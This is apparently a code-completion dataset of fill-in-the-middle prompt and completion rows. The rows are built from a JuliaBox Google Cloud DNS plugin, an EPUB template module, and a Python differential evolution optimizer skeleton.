prompt (large_string, lengths 72–9.34k) | completion (large_string, lengths 0–7.61k) |
---|---|
<|file_name|>impl_gcd.py<|end_file_name|><|fim▁begin|>__author__ = 'Nishanth'
from juliabox.cloud import JBPluginCloud
from juliabox.jbox_util import JBoxCfg, retry_on_errors
from googleapiclient.discovery import build
from oauth2client.client import GoogleCredentials
import threading
class JBoxGCD(JBPluginCloud):
provides = [JBPluginCloud.JBP_DNS, JBPluginCloud.JBP_DNS_GCD]
threadlocal = threading.local()
INSTALLID = None
REGION = None
DOMAIN = None
@staticmethod
def configure():
cloud_host = JBoxCfg.get('cloud_host')
JBoxGCD.INSTALLID = cloud_host['install_id']
JBoxGCD.REGION = cloud_host['region']
JBoxGCD.DOMAIN = cloud_host['domain']
@staticmethod
def domain():
if JBoxGCD.DOMAIN is None:
JBoxGCD.configure()
return JBoxGCD.DOMAIN
@staticmethod
def connect():
c = getattr(JBoxGCD.threadlocal, 'conn', None)
if c is None:
JBoxGCD.configure()
creds = GoogleCredentials.get_application_default()
JBoxGCD.threadlocal.conn = c = build("dns", "v1", credentials=creds)
return c
@staticmethod
@retry_on_errors(retries=2)
def add_cname(name, value):
JBoxGCD.connect().changes().create(
project=JBoxGCD.INSTALLID, managedZone=JBoxGCD.REGION,
body={'kind': 'dns#change',
'additions': [
{'rrdatas': [value],
'kind': 'dns#resourceRecordSet',
'type': 'A',
'name': name,
'ttl': 300} ] }).execute()
@staticmethod
@retry_on_errors(retries=2)
def delete_cname(name):
resp = JBoxGCD.connect().resourceRecordSets().list(
project=JBoxGCD.INSTALLID, managedZone=JBoxGCD.REGION,
name=name, type='A').execute()
if len(resp['rrsets']) == 0:
JBoxGCD.log_debug('No prior dns registration found for %s', name)
else:
<|fim_middle|>
<|fim▁end|> | cname = resp['rrsets'][0]['rrdatas'][0]
ttl = resp['rrsets'][0]['ttl']
JBoxGCD.connect().changes().create(
project=JBoxGCD.INSTALLID, managedZone=JBoxGCD.REGION,
body={'kind': 'dns#change',
'deletions': [
{'rrdatas': [str(cname)],
'kind': 'dns#resourceRecordSet',
'type': 'A',
'name': name,
'ttl': ttl} ] }).execute()
JBoxGCD.log_warn('Prior dns registration was found for %s', name) |
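Each row above pairs a fill-in-the-middle (FIM) prompt with its completion: the prompt wraps a source file in <|fim▁begin|> / <|fim▁end|> sentinels and marks the removed span with <|fim_middle|> (or <|fim▁hole|>), and the completion cell holds the removed text. As a rough illustration of the row layout only (the helper below is inferred from the rows themselves, not taken from any official loader), one row can be reassembled into its original file like this:

```python
# Sketch: splice a completion back into its FIM prompt (one row of this dataset).
FIM_BEGIN = "<|fim▁begin|>"
FIM_END = "<|fim▁end|>"
MIDDLE_SENTINELS = ("<|fim_middle|>", "<|fim▁hole|>")

def reassemble(prompt: str, completion: str) -> str:
    """Return the source file encoded by one prompt/completion pair."""
    body = prompt.split(FIM_BEGIN, 1)[-1]   # drop the <|file_name|> header
    body = body.rsplit(FIM_END, 1)[0]       # drop the closing sentinel
    for sentinel in MIDDLE_SENTINELS:
        if sentinel in body:
            prefix, suffix = body.split(sentinel, 1)
            return prefix + completion + suffix
    return body + completion                # no hole marker: completion is a tail
```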
<|file_name|>impl_gcd.py<|end_file_name|><|fim▁begin|>__author__ = 'Nishanth'
from juliabox.cloud import JBPluginCloud
from juliabox.jbox_util import JBoxCfg, retry_on_errors
from googleapiclient.discovery import build
from oauth2client.client import GoogleCredentials
import threading
class JBoxGCD(JBPluginCloud):
provides = [JBPluginCloud.JBP_DNS, JBPluginCloud.JBP_DNS_GCD]
threadlocal = threading.local()
INSTALLID = None
REGION = None
DOMAIN = None
@staticmethod
def <|fim_middle|>():
cloud_host = JBoxCfg.get('cloud_host')
JBoxGCD.INSTALLID = cloud_host['install_id']
JBoxGCD.REGION = cloud_host['region']
JBoxGCD.DOMAIN = cloud_host['domain']
@staticmethod
def domain():
if JBoxGCD.DOMAIN is None:
JBoxGCD.configure()
return JBoxGCD.DOMAIN
@staticmethod
def connect():
c = getattr(JBoxGCD.threadlocal, 'conn', None)
if c is None:
JBoxGCD.configure()
creds = GoogleCredentials.get_application_default()
JBoxGCD.threadlocal.conn = c = build("dns", "v1", credentials=creds)
return c
@staticmethod
@retry_on_errors(retries=2)
def add_cname(name, value):
JBoxGCD.connect().changes().create(
project=JBoxGCD.INSTALLID, managedZone=JBoxGCD.REGION,
body={'kind': 'dns#change',
'additions': [
{'rrdatas': [value],
'kind': 'dns#resourceRecordSet',
'type': 'A',
'name': name,
'ttl': 300} ] }).execute()
@staticmethod
@retry_on_errors(retries=2)
def delete_cname(name):
resp = JBoxGCD.connect().resourceRecordSets().list(
project=JBoxGCD.INSTALLID, managedZone=JBoxGCD.REGION,
name=name, type='A').execute()
if len(resp['rrsets']) == 0:
JBoxGCD.log_debug('No prior dns registration found for %s', name)
else:
cname = resp['rrsets'][0]['rrdatas'][0]
ttl = resp['rrsets'][0]['ttl']
JBoxGCD.connect().changes().create(
project=JBoxGCD.INSTALLID, managedZone=JBoxGCD.REGION,
body={'kind': 'dns#change',
'deletions': [
{'rrdatas': [str(cname)],
'kind': 'dns#resourceRecordSet',
'type': 'A',
'name': name,
'ttl': ttl} ] }).execute()
JBoxGCD.log_warn('Prior dns registration was found for %s', name)
<|fim▁end|> | configure |
<|file_name|>impl_gcd.py<|end_file_name|><|fim▁begin|>__author__ = 'Nishanth'
from juliabox.cloud import JBPluginCloud
from juliabox.jbox_util import JBoxCfg, retry_on_errors
from googleapiclient.discovery import build
from oauth2client.client import GoogleCredentials
import threading
class JBoxGCD(JBPluginCloud):
provides = [JBPluginCloud.JBP_DNS, JBPluginCloud.JBP_DNS_GCD]
threadlocal = threading.local()
INSTALLID = None
REGION = None
DOMAIN = None
@staticmethod
def configure():
cloud_host = JBoxCfg.get('cloud_host')
JBoxGCD.INSTALLID = cloud_host['install_id']
JBoxGCD.REGION = cloud_host['region']
JBoxGCD.DOMAIN = cloud_host['domain']
@staticmethod
def <|fim_middle|>():
if JBoxGCD.DOMAIN is None:
JBoxGCD.configure()
return JBoxGCD.DOMAIN
@staticmethod
def connect():
c = getattr(JBoxGCD.threadlocal, 'conn', None)
if c is None:
JBoxGCD.configure()
creds = GoogleCredentials.get_application_default()
JBoxGCD.threadlocal.conn = c = build("dns", "v1", credentials=creds)
return c
@staticmethod
@retry_on_errors(retries=2)
def add_cname(name, value):
JBoxGCD.connect().changes().create(
project=JBoxGCD.INSTALLID, managedZone=JBoxGCD.REGION,
body={'kind': 'dns#change',
'additions': [
{'rrdatas': [value],
'kind': 'dns#resourceRecordSet',
'type': 'A',
'name': name,
'ttl': 300} ] }).execute()
@staticmethod
@retry_on_errors(retries=2)
def delete_cname(name):
resp = JBoxGCD.connect().resourceRecordSets().list(
project=JBoxGCD.INSTALLID, managedZone=JBoxGCD.REGION,
name=name, type='A').execute()
if len(resp['rrsets']) == 0:
JBoxGCD.log_debug('No prior dns registration found for %s', name)
else:
cname = resp['rrsets'][0]['rrdatas'][0]
ttl = resp['rrsets'][0]['ttl']
JBoxGCD.connect().changes().create(
project=JBoxGCD.INSTALLID, managedZone=JBoxGCD.REGION,
body={'kind': 'dns#change',
'deletions': [
{'rrdatas': [str(cname)],
'kind': 'dns#resourceRecordSet',
'type': 'A',
'name': name,
'ttl': ttl} ] }).execute()
JBoxGCD.log_warn('Prior dns registration was found for %s', name)
<|fim▁end|> | domain |
<|file_name|>impl_gcd.py<|end_file_name|><|fim▁begin|>__author__ = 'Nishanth'
from juliabox.cloud import JBPluginCloud
from juliabox.jbox_util import JBoxCfg, retry_on_errors
from googleapiclient.discovery import build
from oauth2client.client import GoogleCredentials
import threading
class JBoxGCD(JBPluginCloud):
provides = [JBPluginCloud.JBP_DNS, JBPluginCloud.JBP_DNS_GCD]
threadlocal = threading.local()
INSTALLID = None
REGION = None
DOMAIN = None
@staticmethod
def configure():
cloud_host = JBoxCfg.get('cloud_host')
JBoxGCD.INSTALLID = cloud_host['install_id']
JBoxGCD.REGION = cloud_host['region']
JBoxGCD.DOMAIN = cloud_host['domain']
@staticmethod
def domain():
if JBoxGCD.DOMAIN is None:
JBoxGCD.configure()
return JBoxGCD.DOMAIN
@staticmethod
def <|fim_middle|>():
c = getattr(JBoxGCD.threadlocal, 'conn', None)
if c is None:
JBoxGCD.configure()
creds = GoogleCredentials.get_application_default()
JBoxGCD.threadlocal.conn = c = build("dns", "v1", credentials=creds)
return c
@staticmethod
@retry_on_errors(retries=2)
def add_cname(name, value):
JBoxGCD.connect().changes().create(
project=JBoxGCD.INSTALLID, managedZone=JBoxGCD.REGION,
body={'kind': 'dns#change',
'additions': [
{'rrdatas': [value],
'kind': 'dns#resourceRecordSet',
'type': 'A',
'name': name,
'ttl': 300} ] }).execute()
@staticmethod
@retry_on_errors(retries=2)
def delete_cname(name):
resp = JBoxGCD.connect().resourceRecordSets().list(
project=JBoxGCD.INSTALLID, managedZone=JBoxGCD.REGION,
name=name, type='A').execute()
if len(resp['rrsets']) == 0:
JBoxGCD.log_debug('No prior dns registration found for %s', name)
else:
cname = resp['rrsets'][0]['rrdatas'][0]
ttl = resp['rrsets'][0]['ttl']
JBoxGCD.connect().changes().create(
project=JBoxGCD.INSTALLID, managedZone=JBoxGCD.REGION,
body={'kind': 'dns#change',
'deletions': [
{'rrdatas': [str(cname)],
'kind': 'dns#resourceRecordSet',
'type': 'A',
'name': name,
'ttl': ttl} ] }).execute()
JBoxGCD.log_warn('Prior dns registration was found for %s', name)
<|fim▁end|> | connect |
<|file_name|>impl_gcd.py<|end_file_name|><|fim▁begin|>__author__ = 'Nishanth'
from juliabox.cloud import JBPluginCloud
from juliabox.jbox_util import JBoxCfg, retry_on_errors
from googleapiclient.discovery import build
from oauth2client.client import GoogleCredentials
import threading
class JBoxGCD(JBPluginCloud):
provides = [JBPluginCloud.JBP_DNS, JBPluginCloud.JBP_DNS_GCD]
threadlocal = threading.local()
INSTALLID = None
REGION = None
DOMAIN = None
@staticmethod
def configure():
cloud_host = JBoxCfg.get('cloud_host')
JBoxGCD.INSTALLID = cloud_host['install_id']
JBoxGCD.REGION = cloud_host['region']
JBoxGCD.DOMAIN = cloud_host['domain']
@staticmethod
def domain():
if JBoxGCD.DOMAIN is None:
JBoxGCD.configure()
return JBoxGCD.DOMAIN
@staticmethod
def connect():
c = getattr(JBoxGCD.threadlocal, 'conn', None)
if c is None:
JBoxGCD.configure()
creds = GoogleCredentials.get_application_default()
JBoxGCD.threadlocal.conn = c = build("dns", "v1", credentials=creds)
return c
@staticmethod
@retry_on_errors(retries=2)
def <|fim_middle|>(name, value):
JBoxGCD.connect().changes().create(
project=JBoxGCD.INSTALLID, managedZone=JBoxGCD.REGION,
body={'kind': 'dns#change',
'additions': [
{'rrdatas': [value],
'kind': 'dns#resourceRecordSet',
'type': 'A',
'name': name,
'ttl': 300} ] }).execute()
@staticmethod
@retry_on_errors(retries=2)
def delete_cname(name):
resp = JBoxGCD.connect().resourceRecordSets().list(
project=JBoxGCD.INSTALLID, managedZone=JBoxGCD.REGION,
name=name, type='A').execute()
if len(resp['rrsets']) == 0:
JBoxGCD.log_debug('No prior dns registration found for %s', name)
else:
cname = resp['rrsets'][0]['rrdatas'][0]
ttl = resp['rrsets'][0]['ttl']
JBoxGCD.connect().changes().create(
project=JBoxGCD.INSTALLID, managedZone=JBoxGCD.REGION,
body={'kind': 'dns#change',
'deletions': [
{'rrdatas': [str(cname)],
'kind': 'dns#resourceRecordSet',
'type': 'A',
'name': name,
'ttl': ttl} ] }).execute()
JBoxGCD.log_warn('Prior dns registration was found for %s', name)
<|fim▁end|> | add_cname |
<|file_name|>impl_gcd.py<|end_file_name|><|fim▁begin|>__author__ = 'Nishanth'
from juliabox.cloud import JBPluginCloud
from juliabox.jbox_util import JBoxCfg, retry_on_errors
from googleapiclient.discovery import build
from oauth2client.client import GoogleCredentials
import threading
class JBoxGCD(JBPluginCloud):
provides = [JBPluginCloud.JBP_DNS, JBPluginCloud.JBP_DNS_GCD]
threadlocal = threading.local()
INSTALLID = None
REGION = None
DOMAIN = None
@staticmethod
def configure():
cloud_host = JBoxCfg.get('cloud_host')
JBoxGCD.INSTALLID = cloud_host['install_id']
JBoxGCD.REGION = cloud_host['region']
JBoxGCD.DOMAIN = cloud_host['domain']
@staticmethod
def domain():
if JBoxGCD.DOMAIN is None:
JBoxGCD.configure()
return JBoxGCD.DOMAIN
@staticmethod
def connect():
c = getattr(JBoxGCD.threadlocal, 'conn', None)
if c is None:
JBoxGCD.configure()
creds = GoogleCredentials.get_application_default()
JBoxGCD.threadlocal.conn = c = build("dns", "v1", credentials=creds)
return c
@staticmethod
@retry_on_errors(retries=2)
def add_cname(name, value):
JBoxGCD.connect().changes().create(
project=JBoxGCD.INSTALLID, managedZone=JBoxGCD.REGION,
body={'kind': 'dns#change',
'additions': [
{'rrdatas': [value],
'kind': 'dns#resourceRecordSet',
'type': 'A',
'name': name,
'ttl': 300} ] }).execute()
@staticmethod
@retry_on_errors(retries=2)
def <|fim_middle|>(name):
resp = JBoxGCD.connect().resourceRecordSets().list(
project=JBoxGCD.INSTALLID, managedZone=JBoxGCD.REGION,
name=name, type='A').execute()
if len(resp['rrsets']) == 0:
JBoxGCD.log_debug('No prior dns registration found for %s', name)
else:
cname = resp['rrsets'][0]['rrdatas'][0]
ttl = resp['rrsets'][0]['ttl']
JBoxGCD.connect().changes().create(
project=JBoxGCD.INSTALLID, managedZone=JBoxGCD.REGION,
body={'kind': 'dns#change',
'deletions': [
{'rrdatas': [str(cname)],
'kind': 'dns#resourceRecordSet',
'type': 'A',
'name': name,
'ttl': ttl} ] }).execute()
JBoxGCD.log_warn('Prior dns registration was found for %s', name)
<|fim▁end|> | delete_cname |
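The six rows above all mask spans of impl_gcd.py, which drives Google Cloud DNS through changes().create(...) with a dns#change body. The sketch below builds just that payload as plain data, with no API call, to make explicit what add_cname and delete_cname send; the helper name is invented for illustration, and, as in the rows above, the record type stays 'A' despite the cname naming.

```python
def make_change_body(action, name, rrdatas, ttl=300):
    """Build the dns#change payload used by add_cname / delete_cname above.

    action is 'additions' or 'deletions'; records are type 'A' even though
    the calling methods are named *_cname, mirroring the original code.
    """
    return {
        'kind': 'dns#change',
        action: [{
            'kind': 'dns#resourceRecordSet',
            'type': 'A',
            'name': name,
            'rrdatas': list(rrdatas),
            'ttl': ttl,
        }],
    }

body = make_change_body('additions', 'host.example.com.', ['203.0.113.5'])
print(body)
```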
<|file_name|>templates.py<|end_file_name|><|fim▁begin|>#!/usr/bin/python
# -*- coding: utf-8 -*-
#--------------------------------------------------------------------
# Copyright (c) 2014 Eren Inan Canpolat
# Author: Eren Inan Canpolat <[email protected]>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#--------------------------------------------------------------------
content_template = """<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title></title>
</head>
<body><|fim▁hole|><!DOCTYPE ncx PUBLIC "-//NISO//DTD ncx 2005-1//EN"
"http://www.daisy.org/z3986/2005/ncx-2005-1.dtd">
<ncx xmlns="http://www.daisy.org/z3986/2005/ncx/" version="2005-1">
<head>
<meta name="dtb:uid" content="{book.uuid}" />
<meta name="dtb:depth" content="{book.toc_root.maxlevel}" />
<meta name="dtb:totalPageCount" content="0" />
<meta name="dtb:maxPageNumber" content="0" />
</head>
<docTitle>
<text>{book.title}</text>
</docTitle>
{navmap}
</ncx>"""
container_xml = """<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<container xmlns="urn:oasis:names:tc:opendocument:xmlns:container" version="1.0">
<rootfiles>
<rootfile full-path="OEBPS/content.opf" media-type="application/oebps-package+xml"/>
</rootfiles>
</container>
"""<|fim▁end|> | </body>
</html>"""
toc_ncx = u"""<?xml version="1.0" encoding="utf-8"?> |
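The templates.py row defines content_template, toc_ncx and container_xml as Python format strings with {book.*} and {navmap} placeholders. A hypothetical usage sketch follows; the book stand-in and the navmap snippet are invented for illustration and assume templates.py is importable:

```python
from types import SimpleNamespace
from templates import toc_ncx  # the template string shown in the row above

# Invented stand-in carrying the attributes the template references.
book = SimpleNamespace(
    uuid="urn:uuid:00000000-0000-0000-0000-000000000000",
    title="Example Title",
    toc_root=SimpleNamespace(maxlevel=2),
)
navmap = '<navMap><navPoint id="n1" playOrder="1"><navLabel><text>Start</text>' \
         '</navLabel><content src="ch1.xhtml"/></navPoint></navMap>'

# str.format resolves dotted lookups such as {book.uuid} and {book.toc_root.maxlevel}.
ncx_document = toc_ncx.format(book=book, navmap=navmap)
print(ncx_document.splitlines()[0])
```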
<|file_name|>DifferentialEvolutionAbstract.py<|end_file_name|><|fim▁begin|>import numpy
class DifferentialEvolutionAbstract:
amount_of_individuals = None
f = None
p = None
end_method = None
def __init__(self, min_element=-1, max_element=1):
self.min_element = min_element
self.max_element = max_element
self.f = 0.5
self.p = 0.9
self.func = None
self.population = None
self.func_population = None
self.dim = 0
self.child_funcs = None
self.cost_list = []
self.end_method = 'max_iter'
def set_amount_of_individuals(self, amount_of_individuals):
self.amount_of_individuals = amount_of_individuals
def set_params(self, f, p):
self.f = f
self.p = p
def set_end_method(self, end_method):
self.end_method = end_method
def create_population(self):
# Создаем популяцию
population = []
for _ in range(self.amount_of_individuals):
population.append(numpy.random.uniform(self.min_element, self.max_element, self.dim))
return numpy.array(population)
def choose_best_individual(self):
# Данная функция находит лучшую особь в популяции<|fim▁hole|> func_list = list(self.func_population)
best_index = func_list.index(min(func_list))
return self.population[best_index]
def iteration(self):
return []
def optimize(self, func, dim, end_cond, debug_pop_print=-1):
return []
def return_cost_list(self):
return self.cost_list<|fim▁end|> | |
<|file_name|>DifferentialEvolutionAbstract.py<|end_file_name|><|fim▁begin|>import numpy
class DifferentialEvolutionAbstract:
<|fim_middle|>
<|fim▁end|> | amount_of_individuals = None
f = None
p = None
end_method = None
def __init__(self, min_element=-1, max_element=1):
self.min_element = min_element
self.max_element = max_element
self.f = 0.5
self.p = 0.9
self.func = None
self.population = None
self.func_population = None
self.dim = 0
self.child_funcs = None
self.cost_list = []
self.end_method = 'max_iter'
def set_amount_of_individuals(self, amount_of_individuals):
self.amount_of_individuals = amount_of_individuals
def set_params(self, f, p):
self.f = f
self.p = p
def set_end_method(self, end_method):
self.end_method = end_method
def create_population(self):
# Создаем популяцию
population = []
for _ in range(self.amount_of_individuals):
population.append(numpy.random.uniform(self.min_element, self.max_element, self.dim))
return numpy.array(population)
def choose_best_individual(self):
# Данная функция находит лучшую особь в популяции
func_list = list(self.func_population)
best_index = func_list.index(min(func_list))
return self.population[best_index]
def iteration(self):
return []
def optimize(self, func, dim, end_cond, debug_pop_print=-1):
return []
def return_cost_list(self):
return self.cost_list
|
<|file_name|>DifferentialEvolutionAbstract.py<|end_file_name|><|fim▁begin|>import numpy
class DifferentialEvolutionAbstract:
amount_of_individuals = None
f = None
p = None
end_method = None
def __init__(self, min_element=-1, max_element=1):
<|fim_middle|>
def set_amount_of_individuals(self, amount_of_individuals):
self.amount_of_individuals = amount_of_individuals
def set_params(self, f, p):
self.f = f
self.p = p
def set_end_method(self, end_method):
self.end_method = end_method
def create_population(self):
# Создаем популяцию
population = []
for _ in range(self.amount_of_individuals):
population.append(numpy.random.uniform(self.min_element, self.max_element, self.dim))
return numpy.array(population)
def choose_best_individual(self):
# Данная функция находит лучшую особь в популяции
func_list = list(self.func_population)
best_index = func_list.index(min(func_list))
return self.population[best_index]
def iteration(self):
return []
def optimize(self, func, dim, end_cond, debug_pop_print=-1):
return []
def return_cost_list(self):
return self.cost_list
<|fim▁end|> | self.min_element = min_element
self.max_element = max_element
self.f = 0.5
self.p = 0.9
self.func = None
self.population = None
self.func_population = None
self.dim = 0
self.child_funcs = None
self.cost_list = []
self.end_method = 'max_iter' |
<|file_name|>DifferentialEvolutionAbstract.py<|end_file_name|><|fim▁begin|>import numpy
class DifferentialEvolutionAbstract:
amount_of_individuals = None
f = None
p = None
end_method = None
def __init__(self, min_element=-1, max_element=1):
self.min_element = min_element
self.max_element = max_element
self.f = 0.5
self.p = 0.9
self.func = None
self.population = None
self.func_population = None
self.dim = 0
self.child_funcs = None
self.cost_list = []
self.end_method = 'max_iter'
def set_amount_of_individuals(self, amount_of_individuals):
<|fim_middle|>
def set_params(self, f, p):
self.f = f
self.p = p
def set_end_method(self, end_method):
self.end_method = end_method
def create_population(self):
# Создаем популяцию
population = []
for _ in range(self.amount_of_individuals):
population.append(numpy.random.uniform(self.min_element, self.max_element, self.dim))
return numpy.array(population)
def choose_best_individual(self):
# Данная функция находит лучшую особь в популяции
func_list = list(self.func_population)
best_index = func_list.index(min(func_list))
return self.population[best_index]
def iteration(self):
return []
def optimize(self, func, dim, end_cond, debug_pop_print=-1):
return []
def return_cost_list(self):
return self.cost_list
<|fim▁end|> | self.amount_of_individuals = amount_of_individuals |
<|file_name|>DifferentialEvolutionAbstract.py<|end_file_name|><|fim▁begin|>import numpy
class DifferentialEvolutionAbstract:
amount_of_individuals = None
f = None
p = None
end_method = None
def __init__(self, min_element=-1, max_element=1):
self.min_element = min_element
self.max_element = max_element
self.f = 0.5
self.p = 0.9
self.func = None
self.population = None
self.func_population = None
self.dim = 0
self.child_funcs = None
self.cost_list = []
self.end_method = 'max_iter'
def set_amount_of_individuals(self, amount_of_individuals):
self.amount_of_individuals = amount_of_individuals
def set_params(self, f, p):
<|fim_middle|>
def set_end_method(self, end_method):
self.end_method = end_method
def create_population(self):
# Создаем популяцию
population = []
for _ in range(self.amount_of_individuals):
population.append(numpy.random.uniform(self.min_element, self.max_element, self.dim))
return numpy.array(population)
def choose_best_individual(self):
# Данная функция находит лучшую особь в популяции
func_list = list(self.func_population)
best_index = func_list.index(min(func_list))
return self.population[best_index]
def iteration(self):
return []
def optimize(self, func, dim, end_cond, debug_pop_print=-1):
return []
def return_cost_list(self):
return self.cost_list
<|fim▁end|> | self.f = f
self.p = p |
<|file_name|>DifferentialEvolutionAbstract.py<|end_file_name|><|fim▁begin|>import numpy
class DifferentialEvolutionAbstract:
amount_of_individuals = None
f = None
p = None
end_method = None
def __init__(self, min_element=-1, max_element=1):
self.min_element = min_element
self.max_element = max_element
self.f = 0.5
self.p = 0.9
self.func = None
self.population = None
self.func_population = None
self.dim = 0
self.child_funcs = None
self.cost_list = []
self.end_method = 'max_iter'
def set_amount_of_individuals(self, amount_of_individuals):
self.amount_of_individuals = amount_of_individuals
def set_params(self, f, p):
self.f = f
self.p = p
def set_end_method(self, end_method):
<|fim_middle|>
def create_population(self):
# Создаем популяцию
population = []
for _ in range(self.amount_of_individuals):
population.append(numpy.random.uniform(self.min_element, self.max_element, self.dim))
return numpy.array(population)
def choose_best_individual(self):
# Данная функция находит лучшую особь в популяции
func_list = list(self.func_population)
best_index = func_list.index(min(func_list))
return self.population[best_index]
def iteration(self):
return []
def optimize(self, func, dim, end_cond, debug_pop_print=-1):
return []
def return_cost_list(self):
return self.cost_list
<|fim▁end|> | self.end_method = end_method |
<|file_name|>DifferentialEvolutionAbstract.py<|end_file_name|><|fim▁begin|>import numpy
class DifferentialEvolutionAbstract:
amount_of_individuals = None
f = None
p = None
end_method = None
def __init__(self, min_element=-1, max_element=1):
self.min_element = min_element
self.max_element = max_element
self.f = 0.5
self.p = 0.9
self.func = None
self.population = None
self.func_population = None
self.dim = 0
self.child_funcs = None
self.cost_list = []
self.end_method = 'max_iter'
def set_amount_of_individuals(self, amount_of_individuals):
self.amount_of_individuals = amount_of_individuals
def set_params(self, f, p):
self.f = f
self.p = p
def set_end_method(self, end_method):
self.end_method = end_method
def create_population(self):
# Создаем популяцию
population = []
<|fim_middle|>
_best_individual(self):
# Данная функция находит лучшую особь в популяции
func_list = list(self.func_population)
best_index = func_list.index(min(func_list))
return self.population[best_index]
def iteration(self):
return []
def optimize(self, func, dim, end_cond, debug_pop_print=-1):
return []
def return_cost_list(self):
return self.cost_list
<|fim▁end|> | for _ in range(self.amount_of_individuals):
population.append(numpy.random.uniform(self.min_element, self.max_element, self.dim))
return numpy.array(population)
def choose |
<|file_name|>DifferentialEvolutionAbstract.py<|end_file_name|><|fim▁begin|>import numpy
class DifferentialEvolutionAbstract:
amount_of_individuals = None
f = None
p = None
end_method = None
def __init__(self, min_element=-1, max_element=1):
self.min_element = min_element
self.max_element = max_element
self.f = 0.5
self.p = 0.9
self.func = None
self.population = None
self.func_population = None
self.dim = 0
self.child_funcs = None
self.cost_list = []
self.end_method = 'max_iter'
def set_amount_of_individuals(self, amount_of_individuals):
self.amount_of_individuals = amount_of_individuals
def set_params(self, f, p):
self.f = f
self.p = p
def set_end_method(self, end_method):
self.end_method = end_method
def create_population(self):
# Создаем популяцию
population = []
for _ in range(self.amount_of_individuals):
population.append(numpy.random.uniform(self.min_element, self.max_element, self.dim))
return numpy.array(population)
def choose_best_individual(self):
# Данная функция находит лучшую особь в популяции
func_list = list(self.func_population)
best_index<|fim_middle|>
imize(self, func, dim, end_cond, debug_pop_print=-1):
return []
def return_cost_list(self):
return self.cost_list
<|fim▁end|> | = func_list.index(min(func_list))
return self.population[best_index]
def iteration(self):
return []
def opt |
<|file_name|>DifferentialEvolutionAbstract.py<|end_file_name|><|fim▁begin|>import numpy
class DifferentialEvolutionAbstract:
amount_of_individuals = None
f = None
p = None
end_method = None
def __init__(self, min_element=-1, max_element=1):
self.min_element = min_element
self.max_element = max_element
self.f = 0.5
self.p = 0.9
self.func = None
self.population = None
self.func_population = None
self.dim = 0
self.child_funcs = None
self.cost_list = []
self.end_method = 'max_iter'
def set_amount_of_individuals(self, amount_of_individuals):
self.amount_of_individuals = amount_of_individuals
def set_params(self, f, p):
self.f = f
self.p = p
def set_end_method(self, end_method):
self.end_method = end_method
def create_population(self):
# Создаем популяцию
population = []
for _ in range(self.amount_of_individuals):
population.append(numpy.random.uniform(self.min_element, self.max_element, self.dim))
return numpy.array(population)
def choose_best_individual(self):
# Данная функция находит лучшую особь в популяции
func_list = list(self.func_population)
best_index = func_list.index(min(func_list))
return self.population[best_index]
def iteration(self):
return []
def optimize(self, func, dim, end_cond, de<|fim_middle|>
rint=-1):
return []
def return_cost_list(self):
return self.cost_list
<|fim▁end|> | bug_pop_p |
<|file_name|>DifferentialEvolutionAbstract.py<|end_file_name|><|fim▁begin|>import numpy
class DifferentialEvolutionAbstract:
amount_of_individuals = None
f = None
p = None
end_method = None
def __init__(self, min_element=-1, max_element=1):
self.min_element = min_element
self.max_element = max_element
self.f = 0.5
self.p = 0.9
self.func = None
self.population = None
self.func_population = None
self.dim = 0
self.child_funcs = None
self.cost_list = []
self.end_method = 'max_iter'
def set_amount_of_individuals(self, amount_of_individuals):
self.amount_of_individuals = amount_of_individuals
def set_params(self, f, p):
self.f = f
self.p = p
def set_end_method(self, end_method):
self.end_method = end_method
def create_population(self):
# Создаем популяцию
population = []
for _ in range(self.amount_of_individuals):
population.append(numpy.random.uniform(self.min_element, self.max_element, self.dim))
return numpy.array(population)
def choose_best_individual(self):
# Данная функция находит лучшую особь в популяции
func_list = list(self.func_population)
best_index = func_list.index(min(func_list))
return self.population[best_index]
def iteration(self):
return []
def optimize(self, func, dim, end_cond, debug_pop_print=-1):
return []
def return_cost_list(self):
return<|fim_middle|>
t_list
<|fim▁end|> | self.cos |
<|file_name|>DifferentialEvolutionAbstract.py<|end_file_name|><|fim▁begin|>import numpy
class DifferentialEvolutionAbstract:
amount_of_individuals = None
f = None
p = None
end_method = None
def __init__(self, min_element=-1, max_element=1):
self.min_element = min_element
self.max_element = max_element
self.f = 0.5
self.p = 0.9
self.func = None
self.population = None
self.func_population = None
self.dim = 0
self.child_funcs = None
self.cost_list = []
self.end_method = 'max_iter'
def set_amount_of_individuals(self, amount_of_individuals):
self.amount_of_individuals = amount_of_individuals
def set_params(self, f, p):
self.f = f
self.p = p
def set_end_method(self, end_method):
self.end_method = end_method
def create_population(self):
# Создаем популяцию
population = []
for _ in range(self.amount_of_individuals):
population.append(numpy.random.uniform(self.min_element, self.max_element, self.dim))
return numpy.array(population)
def choose_best_individual(self):
# Данная функция находит лучшую особь в популяции
func_list = list(self.func_population)
best_index = func_list.index(min(func_list))
return self.population[best_index]
def iteration(self):
return []
def optimize(self, func, dim, end_cond, debug_pop_print=-1):
return []
def return_cost_list(self):
return self.cost_list
<|fim_middle|>
<|fim▁end|> | |
<|file_name|>DifferentialEvolutionAbstract.py<|end_file_name|><|fim▁begin|>import numpy
class DifferentialEvolutionAbstract:
amount_of_individuals = None
f = None
p = None
end_method = None
def <|fim_middle|>(self, min_element=-1, max_element=1):
self.min_element = min_element
self.max_element = max_element
self.f = 0.5
self.p = 0.9
self.func = None
self.population = None
self.func_population = None
self.dim = 0
self.child_funcs = None
self.cost_list = []
self.end_method = 'max_iter'
def set_amount_of_individuals(self, amount_of_individuals):
self.amount_of_individuals = amount_of_individuals
def set_params(self, f, p):
self.f = f
self.p = p
def set_end_method(self, end_method):
self.end_method = end_method
def create_population(self):
# Создаем популяцию
population = []
for _ in range(self.amount_of_individuals):
population.append(numpy.random.uniform(self.min_element, self.max_element, self.dim))
return numpy.array(population)
def choose_best_individual(self):
# Данная функция находит лучшую особь в популяции
func_list = list(self.func_population)
best_index = func_list.index(min(func_list))
return self.population[best_index]
def iteration(self):
return []
